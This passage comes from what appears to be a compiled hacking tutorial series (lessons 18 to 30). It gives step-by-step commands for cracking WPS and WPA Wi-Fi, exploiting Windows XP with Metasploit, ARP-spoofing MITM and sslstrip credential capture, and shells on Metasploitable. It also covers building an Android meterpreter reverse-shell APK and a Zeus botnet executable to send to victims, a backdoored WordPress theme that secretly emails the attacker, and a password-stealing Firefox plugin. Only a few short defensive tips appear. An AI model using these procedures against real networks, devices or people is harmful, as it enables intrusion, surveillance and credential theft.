that screen, or a screenshot. The password was cracked in less than a second.
Troubleshooting
A person commented on another wireless hacking post. This is the problem he faced.
whenever i try to use aireplay-ng, with the options, always fail saying that mon0 is in channel -1 and the target is in
other channel. How can i fixed this? i looked a lot for a real answer but nobody know what is this.
I was facing this problem when my mon0 kept hopping from one channel to the other, and the second step alone
solved my problem. If your airmon-ng assigns itself a fixed channel on its own will, without you even specifying it,
then the problem might be more complicated. If the above steps don't solve the problem, take a look here
- http://ubuntuforums.org/showthread.php?t=1598930
Lesson 18: Hack WEP with WPS enabled
So that'll take 3 hours approximately. And that's all the combinations, and most
probably the correct pin will not be the last combination, so you can expect to reach
the result earlier. However, the assumption is that bruteforcing will take place at a key
per second. My personal best is a key every 2 seconds, and yours might drop to as low
as a key every 10 seconds.
And if you are already familiar with hacking WEP, then just go to your Kali Linux
terminal and type the above command (replacing what needs to be replaced). Leave
your machine as is, come back 10 mins later, check the progress (must be 1%
or something), and go take a nap. However, if you're a newbie, then tag along.
Kali Linux
First off, you need to have Kali linux (or backtrack) up and running on your machine.
Any other Linux distro might work, but you'll need to install Reaver on your
own. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines,
and you might have to do a live boot using live CD or live USB of Kali Linux. See the
last section of this post on = troubleshooting by scrolling down a bit)
Information Gathering
Now you need to find out the following about you target network-
Does it have WPS enabled. If not, then the attack will not work.
The BSSID of the network.
Now to check whether the network has WPS enabled or not, you can either
use wash or just use the good old airodump-ng. Wash is specifically meant to check
whether a network has WPS enabled or not, and thereby is much easier to use. Here
are the steps-
This is an error which I haven't figured out yet. If you see it, then you'll have to do some howework, or move
on to airodump method. Update : wash -i mon0 --ignore-fcs might solves the issue.
Use airodump-ng. It will show all networks around you. It tells which of them use
WPA. You'll have to assume they have WPS, and then move to next steps.
airodump-ng mon0
None of them has WPS enabled, just saying.
BSSID of the network - Now irrespective of what you used, you should have a
BSSID column in the result that you get. Copy the BSSID of the network you want to
hack. That's all the information you need.
Reaver
Now finally we are going to use Reaver to get the password of the WPA/WPA2
network. Reaver makes hacking very easy, and all you need to do is enter-
After some hours, you will see something like this. The pin in this case was
intentionally 12345670, so it was hacked in 3 seconds.
Here is an extra section, which might prove useful (or more like consoling, to let you
know you are not the only one who is having troubles)
Known problems that are faced - Troubleshooting
1. As in the pic above, you saw the first line read "Switching wlan0 to channel 6".
(Yours will be mon0 instead of wlan0). Sometimes, it keeps switching
interfaces forever.
2. Sometimes it never gets a beacon frame, and gets stuck in the waiting for
beacon frame stage.
3. Sometimes it never associates with the target AP.
4. Sometimes the response is too slow, or never comes, and a (0x02) or something
error is displayed.
In most cases, such errors suggest-
1. Something wrong with wireless card.
2. AP is very choosy, won't let you associate.
3. The AP does not use WPS.
4. You are very far from the AP.
Possible workarounds-
1. Sometimes, killing naughty processes helps. (see pictures below)
2. Move closer to target AP
3. Do a fakeauth using aireplay-ng (Check speeding up WEP hacking) and tell
Reaver not to bother as we are already associated using -A (just add -A at the
end of your normal reaver code)
4. If you are using Kali Linux in Vmware, try booting into Kali using USB. I don't
know why, but sometimes internal adapters work wonders, and can't be used
from inside of a VM. In my case, booting up from USB and using internal
adapter increased the signal strength and speeded up the bruteforce
process. Update : It has nothing to do with internal adapter. I have verified
my observation with various hackers, and it is now a known problem with
Reaver. It does not work well inside Virtual machines. It is recommended
that you do a live boot.
Now the first step is conceptually easy. What you need is you, the attacker, a client
who'll connect to the wireless network, and the wireless access point. What happens is
when the client and access point communicate in order to authenticate the client, they
have a 4 way handshake that we can capture. This handshake has the hash of the
password. Now there's no direct way of getting the password out of the hash, and thus
hashing is a robust protection method. But there is one thing we can do. We can take
all possible passwords that can exists, and convert them to hash. Then we'll match the
hash we created with the one that's there in the handshake. Now if the hashes match,
we know what plain text password gave rise to the hash, thus we know the password.
If the process sounds really time consuming to you, then its because it is. WPA
hacking (and hash cracking in general) is pretty resource intensive and time taking
process. Now there are various different ways cracking of WPA can be done. But
since WPA is a long shot, we shall first look at the process of capturing a handshake.
We will also see what problems one can face during the process (I'll face the problems
for you). Also, before that, some optional wikipedia theory on what a 4-way
handshake really is (you don't want to become a script kiddie do you?)
1. The AP sends a nonce-value to the STA (ANonce). The client now has all the
attributes to construct the PTK.
2. The STA sends its own nonce-value (SNonce) to the AP together with a MIC,
including authentication, which is really a Message Authentication and
Integrity Code: (MAIC).
3. The AP sends the GTK and a sequence number together with another MIC.
This sequence number will be used in the next multicast or broadcast frame, so
that the receiving STA can perform basic replay detection.
4. The STA sends a confirmation to the AP.
All the above messages are sent as EAPOL-Key frames.
As soon as the PTK is obtained it is divided into five separate keys:
PTK (Pairwise Transient Key 64 bytes)
1. 16 bytes of EAPOL-Key Confirmation Key (KCK) Used to compute MIC on
WPA EAPOL Key message
2. 16 bytes of EAPOL-Key Encryption Key (KEK) - AP uses this key to encrypt
additional data sent (in the 'Key Data' field) to the client (for example, the RSN
IE or the GTK)
3. 16 bytes of Temporal Key (TK) Used to encrypt/decrypt Unicast data packets
4. 8 bytes of Michael MIC Authenticator Tx Key Used to compute MIC on
unicast data packets transmitted by the AP
5. 8 bytes of Michael MIC Authenticator Rx Key Used to compute MIC on
unicast data packets transmitted by the station
The Michael MIC Authenticator Tx/Rx Keys provided in the handshake are only used
if the network is using TKIP to encrypt the data.
By the way, if you didn't understand much of it then don't worry. There's a reason
why people don't search for hacking tutorials on Wikipedia (half the stuff goes above
the head)
root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
Now as you can see, my network showed up as 'me'. I pressed ctrl+c and wifite asked
me which target to attack (the network has wps enabled. This is an added bonus,
reaver can save you from all the trouble. Also, wifite will use reaver too to skip the
whole WPA cracking process and use a WPS flaw instead., in this tutorial we'll forget
that this network has WPS and capture the handshake instead)
[+] select target numbers (1-3) separated by commas, or 'all':
Now I selected the first target, i.e. me. As expected, it had two attacks in store for us.
First it tried the PIN guessing attack. It has almost 100% success rate, and would have
given us the password had I waited for 2-3 hours. But I pressed ctrl+c and it tried to
capture the handshake. I waited for 10-20 secs, and then pressd ctrl+c. No client was
there so no handshake could be captured. Here's what happened.
[+] 1 target selected.
[0:00:00] initializing WPS PIN attack on me (02:73:8D:37:A7:ED)
^C0:00:24] WPS attack, 0/0 success/ttl,
(^C) WPS brute-force attack interrupted
[0:08:20] starting wpa handshake capture on "me"
[0:08:05] listening for handshake...
(^C) WPA handshake capture interrupted
[+] 2 attacks completed:
[+] 0/2 WPA attacks succeeded
[+] disabling monitor mode on mon0... done
[+] quitting
Now I connected my other PC to 'me'. Lets do it again. This time a client will show
up, and wifite will de-authenticate it, and it'll try to connect again. Lets see what
happens this time around.
Now the deauth attacks weren't working. This time I increased the deauth frequency.
root@kali:~# wifite -wpadt 1
Soon, however, I realized, that the problem was that I was using my internal card
(Kali Live USB). It does not support packet injection, so deauth wasn't working. So
time to bring my external card to the scene.
root@kali:~# wifite
.;' `;,
.;' ,;' `;, `;, WiFite v2 (r85)
.;' ,;' ,;' `;, `;, `;,
:: :: : ( ) : :: :: automated wireless auditor
':. ':. ':. /_\ ,:' ,:' ,:'
':. ':. /___\ ,:' ,:' designed for Linux
':. /_____\ ,:'
/ \
See, we can use the USB card now. This will solve the problems for us.
Now look at wifite output
As you can see, it took me 57 seconds to capture the handshake (5 deauth requests
were sent, one every 10 secs is defualt). The no dictionary error shouldn't bother you.
We'll use Wifite only to capture the handshake. Now the captured handshake was
saved as a .cap file which can be cracked using aircrack, pyrit, hashcat (after
converting .hccap), etc. using either a wordlist or bruteforce. Let's see how to do the
same thing with airodump-ng. This time I won't show you the problems you might run
into. It'll be a perfect ride, all the problems were seen in wifite case.
Now copy the bssid field of your target network (from airodump-ng ng screen)and
launch a deauth attack with aireplay-ng
The --deauth tells aireplay to launch a deauth attack. 0 tell it to fire it at interval of 0
secs (very fast so run it only for a few secs and press ctrl+c). -a will required BSSID
and replace BSSID here with your target BSSID. mon0 is the interface you created.
In case you face problems with the monitor mode hopping from one channel to
another, or problem with beacon frame, then fix mon0 on a channel using-
root@kali:~# airodump-ng mon0 -w anynamehere -c 1
Replace 1 with the channel where your target AP is. You might also need to add --
ignore-negative-one if aireplay demands it. In my case airodump-ng says fixed
channel mon0: -1 so this was required. (It's a bug with aircrack-ng suite).
Now when you look at the airodump-ng screen, you'll see that at the top right it says
WPA handshake captured . Here is what it looks like
CH 1 ][ Elapsed: 24 s ][ 2014-06-13 22:41 ][ WPA handshake: **
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
* * 0 0e- 1 742 82 me
* * -35 0e- 1 0 26
Happy cracking, all that needs to be done in this tutorial has been done. Its been a
long one. Hope it helped you.
Lesson 20: Hacking Windows XP
Virtual Machines
With PostgreSQL up and running, we next need to launch the metasploit service. The
first time the service is launched, it will create a msf3 database user and a database
called msf3. The service will also launch the Metasploit RPC and Web servers it
requires.
msfconsole
show options
Now we have to change a few settings, firstly, we should reduce the number of ports
scanned
Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is
not going to be the same in all cases. So here's what you'll do. Go to your XP virtual
machine (the one you are trying to hack). Open command prompt and type
ipconfig
In the results, check the IP of the machine. This is what you'll have to specify the
RHOSTS option as.
There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.
Now we are ready for some action, do a show options again to see what all changes
you've made. Finally, type-
run
The scan will start and after some time it will show you which tcp ports are open and
vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any
vulnerable ports.
This basically means that there are no open ports here. Nothing much you can do.
However if you had some good luck there, and had a vulnerable machine, you will
have some vulnerable ports. In my case, I turned off the firewall on the windows
machine and run the auxiliary module again.
I got 3 open ports this time. If you are using some higher XP version, you too might
need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445
open.
Finding Exploits
This step is important. We need to figure out which exploits work on the OS we are
attacking. In our case, we already know what to do. Type back to get out of auxiliary
scanner. Search for dcom on msfconsole.
search dcom
Copy the exploit number 3. (Which shows great as rank). In the next line, type
use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit. Type show options again
show options
Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
exploit
You have now successfully broken into the target computer. You have an open shell
on the target computer with administrator privileges. In short, you own that computer
now. Try out what all you can do from here on. I'll come up with more in the next
tutorial.
Open Vmware workstation. Click on file -> Open. Something like this will pop out.
After that browse to the location where you extracted the Metasploitable file. It must
look somewhat like this. Click on open. You will see something with Vmware icon.
Open that one.
Your Virtual machine will be up and running within a few minutes. Depending on the
situation, a few more
next and enter stuff would be required, but the instructions provided by the program
would be simple and clear and you can help yourself.
I believe most of you already know and learn about the concept what is man in the middle attack, but
if you still don't know about this, here is some definition from wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography
and computer security is a form of active eavesdropping in which the attacker makes independent
connections with the victims and relays messages between them, making them believe that they are
talking directly to each other over a private connection, when in fact the entire conversation is
controlled by the attacker.
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf
2. You can change your terminal interface to make the view much more friendly and easy to monitor
by splitting kali linux terminal window.
5. After step three and four, now all the packet sent or received by victim should be going through
attacker machine.
6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it
observes. Fun to run on a host which sees lots of web traffic.
driftnet -i eth0
When the victim browses a website with image, driftnet will capture all image traffic.
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal
8. For the next step we will try to capture the website information/data by using urlsnarf. To use
urlsnarf, just run this code
urlsnarf -i eth0
and urlsnarf will start capturing all website address visited by victim machine.
9. When the victim browses a website, attacker will know the address victim visited.
Lesson 23: Metasploitable 2 Vulnerability
Assessment.
Portscan
On a Kali Linux machine, open a terminal. Type ifconfig, and note the eth0 IP
address. This will give you an idea of what the ip of your target machine could be. In
my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that
Metasploitable must have an IP residing somewhere in the 192.168.154.xxx range. To
scan all ports in that range, you can use Nmap scan. Here is what it should look like.
Vulnerabilities
Now the Metasploitable 2 operating system has been loaded with a large number of
vulnerabilites. There are the following kinds of vulnerabilities in Metasploitable 2-
1. Misconfigured Services - A lot of services have been misconfigured and
provide direct entry into the operating system.
2. Backdoors - A few programs and services have been backdoored. These
backdoors can be used to gain access to the OS.
3. Weak Passwords - These are vulnerable to bruteforce attacks.
4. Vulnerable Web Services- A few web services pre-installed into
Metasploitable have known vulnerabilities which can be exploited.
5. Web Application Vulnerabilities - Some vulnerable web applications can be
exploited to gain entry to the system.
There is a very resourceful article about many vulnerabilities on Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports which you came up across during the port scan? The
512,513 and 514 ports are there for remotely accessing Unix machines. They have
been misconfigured in such a way that anyone can set up a remote connection without
proper authentication. This vulnerability is easy to exploit. We will use rlogin to
remotely login to Metasploitable 2. Type rlogin to see the details about the command
structure.
root@kali:~# rlogin
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[user@]hostname [command]
root@192.168.154.132's password:
As you can see, it is asking for a password. It's not because the target is not
vulnerable. It's because we don't have ssh-client installed on Kali Linux. The rsh-
client is a remote login utility that it will allow users to connect to remote machines.
This will start the installation progress, you'll have to type yes once or twice, Kali will
do the rest for you. After the installation is successful, you should try your previous
command again. This time around, things will be better.
Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
applicable law.
http://help.ubuntu.com/
root@metasploitable:~#
Now you have an administrator privilege shell on Metasploitable 2. That was as easy
as typing one line. (and installing an application). We have one more such
vulnerability that can be exploited easily.
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a
popular FTP server. The version that is installed on Metasploit contains a backdoor.
The backdoor was quickly identified and removed, but not before quite a few people
downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley),
the backdoored version will open a listening shell on port 6200. This means anyone
can login to a computer without knowing the credentials, just use :). This can be
exploited using Metasploit. We will cover this in the next tutorial. Till then something
for your appetite-
telnet 192.168.99.131 1524
This is a another one line exploit, on the 1524 ingreslock port (see portscan result).
Lesson 24: Hacking Android
Nowadays mobile users are increasing day by day, the security threat is also increasing together
with the growth of its users. Our tutorial for today is how to Hack Android Smartphones using
Metasploit.
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen
mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc.,
which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with
the founding of the Open Handset Alliance: a consortium of hardware, software, and
telecommunication companies devoted to advancing open standards for mobile devices.What is
android? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application
software and middleware onto Google's Android operating system; very similar to an MSI package in
Windows or a Deb package in Debian-based operating systems like Ubuntu.
Requirements:
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp
LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94 now execute the command.
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker
machine, attacker needs to set up the handler to handle incoming connections to the port already
specified above. Type msfconsole to go to Metasploit console.
Info:
4. The next step we need to configure the switch for the Metasploit payload we already specified in
step 3.
Info:
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how
to distribute this file, internet is the good place for distribution ).
6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim
open the application, the meterpreter session will open and the attack has begun.
7. this means that attacker already inside the victim android smartphone and he can do everything
with victim phone.
such as:
back camera
front camera
webcam_snap 2 Would take a picture from one of the cameras
sneaky sneaky.
Conclusion:
2. If you really want to install APK's from unknown source, make sure you can view, read and
examine the source code.
Lesson 25: Remote Administration Tool (RAT)
Today we will learn how to set up Remote Administration Tool Zeus BotNet (RAT). We choose Zeus
because Zeus was one of the famous trojan horse viruses in history that infected many servers
around 2007-2010.
If you don't know about Zeus, here is the definition from Wikipedia:
Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and
Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First
identified in July 2007 when it was used to steal information from the United States Department of
Transportation, it became more widespread in March 2009. In June 2009, security company Prevx
discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies
as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and
BusinessWeek.
In late 2010, a number of Internet security vendors including McAfee and Internet Identity claimed
that the creator of Zeus had said that he was retiring and had given the source code and rights to
sell Zeus to his biggest competitor, the creator of the SpyEye trojan. However, those same experts
warned the retirement was a ruse and expect the cracker to return with new tricks. As of 13 May
2011, the source code and compiled binaries are found to be hosted on GitHub.
Requirements:
2. Open the internet browser and type http://localhost/phpmyadmin. Input the username and
password, by default the username is root and password leave it empty. After that create a new
database, I named it bot, but you can change it into whatever you want. This database name will be
used for the installation of remote administration tool.
3. The next step we need to download the remote administration tool file and extract it, you will find 3
main folders, builder, other, and server[php]. Create a new folder inside C:\xampp\htdocs. I
give the folder name as bot, then copy the server [php] contents into C:\xampp\htdocs\bot.
4. Now back again into our web browser and type http://localhost/bot/install into the
address bar. Input all required field with the correct information.
Information:
The host address for MySQL filled with your database server IP address. If you run XAMPP it
should be your IP address.
Database is filled with information about our database name that already created in step 2.
Encryption key you can fill with any characters with length from 1 255
ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this
MySQL server
b. In the edit user page, scroll down and find the login information section. Change the Host
from localhost to Any host and press Go button.
6. The next step is configuring and create the zeus bot client. Open the builder folder and
open config.txt configuration file. Change
the url_config, url_loader and url_server configuration according to your settings for your
IP address.
Click builder, then click browse, Click build the bot configuration under the actions header, then build
the bot executable.
8. After all the build bot config and bot executable on step 7, now we have the new
file config.bin and bot.exe. Copy those two file into the htdocs folder. Mine was
inside C:\xampp\htdocs\bot.
9. Now let's says we will send the generated bot.exe to the victim. After victim execute the file we
can check our attacker server. Open the browser and type http://localhost/bot/cp.php and
insert your username and password.
10. We can see the new infected victim in the web interface and even view the desktop screenshot
of the victim.
Conclusion:
1. When victim already infected, attacker can gather many information from the victim including all
internet activities and even gather all the website username and password since this tool can act as
a keylogger and capturing the log in information.
2. To prevent the attack of this trojan, always update your operating system and anti virus and do not
click any link that looks suspicious in your mail or chat messenger.
Lesson 26: Hacking Basic HTTP Authentication using
Burp Suite
Hacking http basic authentication dictionary attacks with burp suite free is our tutorial for today, we
will use a tool called BURP suite.
If you just hear about BURP suite, here is the explanation from their website:
Burp Suite is an integrated platform for performing security testing of web applications. Its various
tools work seamlessly together to support the entire testing process, from initial mapping and
analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art
automation, to make your work faster, more effective, and more fun.
The simplest and most common HTTP authentication in use is Basic. The clients need to provide the
credentials in a Base64 encoded string username:password. If the credentials are correct
the web server returns the requested resource otherwise the server repeats the authentication
challenge.
Requirements:
1. Download BURP suite at portswigger.net (in this tutorial I use the free edition) and install it.
2. Run your BURP suite and change your browser proxy setting to run through BURP application.
By default BURP will use port 8080, if you don't know how to change the browser proxy settings, a
simple google search can tell you how.
3. When proxy already set up, now we can access the login.php file. In this example, for testing
purpose, I will input username = test and password = test. When we click the submit button(LOG
IN), BURP will intercept the data.
4. On INTRUDER > POSITIONS tab, change the attack type to "Cluster Bomb".
5. After finished setting up the attack type, we can move to PAYLOADS tab. To fill this PAYLOADS,
see the picture on step 4
we will set up the same PHP SESSID value, because the system uses a static PHPSESSID.
6. Now we will change the payload set number two, we're still on PAYLOADS TAB.
you can load the username data from username list. I input the username one by one.
on this step you also can load from a password list, but in above example I input the passwrd one
by one.
since this submit is to check whether user click the button or not, we can make it the same value
LOG+IN%21.
9. Every PAYLOADS has been set up successfully, now we will start the attack and
watch BURP suite perform the attack automatically. Click Intruder and choose "Start Attack".
10. BURP suite itruder will check the username and password one by one. When there's
matching username and password, you can view the length was changed. From this example we
know that the username = admin and password = 123456
Conclusion:
1. To prevent this kind of attack, as a user you can do nothing, as developer you can do like GMail
anti brute force system where every trying is logged by the system based on their IP address. If you
try to log in and failed for several times, the system will force the user to solve the captcha.
2. As a developer you can do add the salt into username and password to make attack time much
longer since you've added the salt, but in my opinion the first conclusion was better.
Lesson 27: Hacking Wordpress Send Secret emails
from malicious layout codes about site info.
oday title is Hacking WordPress: Send Email Secretly About Website Information.
Requirements:
1. Understand PHP,
2. The script on step one if executed will show the details of active wordpress user (logged
in). execute this script on your local wordpress server, here is what I got:
Username: victim
Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB
User email: victim@victim.com
User first name:
User last name:
User display name: victim
User ID: 1
3. Even we know the username and password hash, but we still need time to crack
the password hash to get the plain password from the user.
On our last hacking tutorial about WordPress hacking tutorials to add administrator user secretly,
we can add administrator secretly by spreading the malicious themes, but the problem is: "how do
we know who already download the malicious wordpress themes?"
4. From the problem in step three, we will use the method to combine this tutorial WordPress
hacking tutorials to add administrator user secretly and send the URL address of the
infected website by inserting the following script.
5. When saw this email address, it's way too plain how if we encode it using base64_encode
PHP function, and here is the result.
6. The script I provide you will send email secretly to the attacker containing
the wordpress URL when victim logs in and browses his/her wordpress website.
Conclusion:
3. Usually this kind of attack you can find on a premium wordpress themes (nulled edition or
warez), make sure you check the source code one by one the themes to minimize the attack.
you can give a try to find the strings below in your themes code (especially the nulled and warez
edition) to check whether it has a malicious code or not.
We will learn how to reveal the asterisk on Mozilla Firefox and Google Chrome without seeing the
saved password from the browser options menu.
If you still never heared about Firebug, here is the description from wikipedia:
Firebug is a web development tool that facilitates the debugging, editing, and monitoring of
any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development
tools.[2] Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to
run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as
external CSS, JavaScript, and image files. The net panel can display both request headers and
response headers for each page asset; it can also estimate the time each asset took to load.
Requirements:
2. Google chrome.
2. On Add-ons page, there is a search box, type firebug on the textbox and click search, or you
can go directly to this page https://addons.mozilla.org/en-US/firefox/addon/firebug/.
Click install if there is a pop out window asking you to install this add ons.
3. This is the firebug button. to activate firebug you only need to click this button and click once
again to deactivate.
4. Now we try to open a website with log in page, e.g: mail.live.com and input the password. Right
click on the password box and choose Inspect Element.
5. Double click the type="password" and change it into type="text".
Open the log in page, right click the password box and choose inspect element
The title Hacking Internet Users Password Using Malicious Firefox Plugin has come after some
students asked about the possibility to gather username and password from browser plugin.
The answer is yes you can gather a username and password from internet users when they
installed a malicious plugin.
In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to
an existing software application. When an application supports plug-ins, it enables customization.
The common examples are the plug-ins used in web browsers to add new features such as search-
engines, virus scanners, or the ability to utilize a new file type such as a new video format.
in this Hacking Internet Users Password Using Malicious Firefox Plugin case, the attacker will
change or add or modify or create the main function of a firefox plugin and override or rewrite some
function to do some malicious activities with benefit for the attacker.
Requirements:
2. Understand Javascript
3. Social Engineering
The victim browser, which has a malicious Firefox plugin installed, is accessing the internet. As
victim browses the internet, the infected browser will also send the data to the attacker server.
The data is which website victim visited, and send the username and password as well.
the attacker harvester website will grab all GET or POST method and store it in a simple TXT file,
but it can change to other database server as well.
Conclusion:
1. Make sure you download the plugin only from trusted source (e.g: http://addons.mozilla.org/).
Lesson 30: Breaking SSL Encryption
Level : Medium, Advanced
Some people ask "Are you sure SSL(Secure Socket Layer) port 443 can be hacked and we know
the password sent over the network??"..how to break ssl protection using sslstrip?
What is SSL?
actually if you see my explanation about SSL in my previous post, when we try to break
the encryption its a little bit hard to break, but here in this tutorial I will explain how to break
the SSL encryption without breaking the SSL encryption using Man in the Middle Attack :-).
1. KALI LINUX
2. Arpspoof
3. IPTables
4. SSLStrip
5. NetStat
1. Set your Linux box to make it can forward every incoming port(enable port forwarding).
This code will let your Linux Backtrack have ability to forward every packet that was not intended for
your machine.
netstat -nr
a. Change "eth0" to your network card that currently connected to the network. Usually it
is eth0 or wlan0.
c. In this tutorial I use arpspoof to entire network. Be careful if your network has a large userbase
connected to it, because it will crash your network and bring your network down.
SSL Strip
Created by Moxie Morlinspike who provides a demonstration of the HTTPS stripping attacks that
presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch
for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-
similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon,
selective logging, and session denial. -Taken from author website-
This all happens on the fly, and is practically will invisible to users. The only way to notice is by
checking the URL in the address bar where normally it would display HTTPS, it will now
display HTTP instead.
3. cd sslstrip-0.9
1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to
ensure our outgoing connections (from SSL Strip) get routed to the proper port.
2. After finished set up iptables, the next step we need to redirect all network HTTP traffic through
our computer using ARPSpoof (dont forget to enable IP forwarding)
sslstrip -l 8080
SSL Strip is already running and waiting for victim opening SSL URL such as
(https://mail.google.com; https://mail.yahoo.com; etc)
As a victim I will try to open https://mail.live.com. When I open the page, I expect the url to
no longer be in secure socket layer.
4. After SSL Strip capturing enough data, to stop ARPSpoof and SSL Strip just hit CTRL + C. After
you stop it, the whole network will be down and cannot be accessed for a while(it shouldnt take
long time), this can happen because ARPSpoof didnt automatically repopulate the ARP tables with
router proper MAC address.
5. Inside the SSL Strip folder there will be a new file created "sslstrip.log" that stores all
information that already captured over the HTTP protocol and even the HTTPS. Just take a look to
the file using your favorite text editor. Below picture is the content of my sslstrip.log :that
already captured victim data when they open https://mail.live.com.
You can see the plain data of username and password there in the log.
1. If you are on public network (internet cafe, unsecured hotspot, etc) minimalize login into your
personal account.